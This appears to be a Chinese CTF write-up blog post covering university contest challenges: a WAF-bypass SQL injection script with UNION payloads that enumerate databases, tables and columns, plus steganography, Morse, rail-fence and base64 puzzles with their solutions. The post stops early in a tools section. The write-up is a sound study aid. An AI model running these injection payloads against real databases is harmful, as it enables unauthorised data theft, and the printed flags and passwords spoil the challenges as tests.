【浅记CTF（一）】复习周来袭

文章目录

前言：
【WEB】sql_checkin
【杂项】easy_misc
- 莫斯密码解密
- lsb加密隐写
- 栅栏密码
【杂项】Un(ix)zip
- unixzip
- Base64
【杂项】Do_you_konw_school_motto（复现）
- Mp3隐写
- IP置换盒？
- lsb加密隐写
【WEB】medium-unserialize【复现】
- 了解整个逻辑
- Phar反序列化
- 原生类的反序列化
- 强制垃圾回收gc
- 构造phar包
- 签名更改
- 上传phar包

前言：

不多但都是自己认认真真复盘的
里面的代码都是自己敲出来的
毕竟人家复盘讲解啥的给你看看就不错了～
复习周来了，不得不去。
有收获的话就给个赞吧…
首发于 https://sleepymonster.cn/

【WEB】sql_checkin

题目来自 2021暨南大学新生赛决赛Web签到题

直接放WAF

<?php
function waf($var)
{if(preg_match("/select|union|or|ro|where/", $var)){return 'no no no';}else{return $var;}
}

这是一道非常基础的题，过程我就不放了，放个脚本吧。

一步步做就很方便，具体怎么改操作tamper就好了

def tamper(payload, **kwargs):payload= payload.lower()payload= payload.replace('group_contact' , 'GROUP_CONCAT') # 因为是函数 所以就不支持大小写混用payload= payload.replace('select' , 'Select')payload= payload.replace('union' , 'Union')payload= payload.replace('or' , 'Or')payload= payload.replace('ro' , 'Ro')payload= payload.replace('where' , 'Where')retVal=payloadreturn retValdatabase = 'easysql'
table = 'flag'
column = 'flag'
payloadFindField = '" union select 1,2,3 #'
payloadFindFlag = f'" union select 1,2,(select {column} from {database}.{table}) #'
payloadFindColumn = f'" union select 1,2,(select group_contact(column_name) from information_schema.columns where table_schema="{database}" and table_name="{table}") #'
payloadFindTable = f'" union select 1,2,(select group_contact(table_name) from information_schema.tables where table_schema="{database}") #'
payloadFindDataBase = '" union select 1,2,(select group_contact(schema_name) from information_schema.schemata) #'
payloadArray = [payloadFindDataBase, payloadFindTable, payloadFindColumn, payloadFindFlag]
payloadDescription = ['判断数据库','判断数据表','判断数据列','拿到Flag']
progress = 0 + int(database is not '') + int(table is not '') + int(column is not '')
print(f'[*] 请先判断字段：{payloadFindField}')
print(f'[*] 当前进度：{payloadDescription[progress]}, 请复制下一行的话进行注入')
print(tamper(payloadArray[progress]))

【杂项】easy_misc

题目来自 2021暨南大学新生赛初赛

莫斯密码解密

解密网站：http://www.hiencode.com/morse.html

lsb加密隐写

用了stegsolve找不到

用了zsteg zsteg ./lalala.png -v还是不行

找了Steghide以为是把密码写到文件里面然后用莫斯那个密码解出来，还是不行

Steghide 参考链接 https://www.jianshu.com/p/c3679f805a0c

最后是问了大佬 https://github.com/livz/cloacked-pixel

开始动手～

拿到解压密码 this_is_the_second_password

栅栏密码

解密网站：https://www.qqxiuzi.cn/bianma/zhalanmima.php

【杂项】Un(ix)zip

题目来自 第四届2021美团网络安全高校挑战赛

unixzip

unzip 就是解压，unix就是在unix下

一共有36位然后依照顺序连起来

ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9

Base64

Base64算法

第一步，“M”、“a”、"n"的ASCII值分别是77、97、110，对应的二进制值是01001101、01100001、01101110，将它们连成一个24位的二进制字符串010011010110000101101110。

第二步，将这个24位的二进制字符串分成4组，每组6个二进制位：010011、010110、000101、101110。

第三步，在每组前面加两个00，扩展成32个二进制位，即四个字节：00010011、00010110、00000101、00101110。它们的十进制值分别是19、22、5、46。

第四步，根据表格，得到每个值对应Base64编码，即T、W、F、u。

如果字节数不足三(余2 与余1)

“M”、“a” => 01001101、01100001 => 010011|010110|0001=> 00010011|00010110|00000100(最后一组除了前面加两个0以外，后面也要加两个0) => 对应Base64值分别为T、W、E，再补上一个"="号，因此"Ma"的Base64编码就是TWE=

“M” => 01001101 => 010011|01 => 00010011 | 00010000 => TQ== 补上二个"="号

上面的一共有36位一个字母为一个字节即8Bit 为3的倍数

import base64
print(base64.b64decode("ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9"))

【杂项】Do_you_konw_school_motto（复现）

题目来自 2021年暨南大学新生赛决赛

Mp3隐写

一般是查询谱写，隐谱图。

发现了个工具箱整理：太长了

工具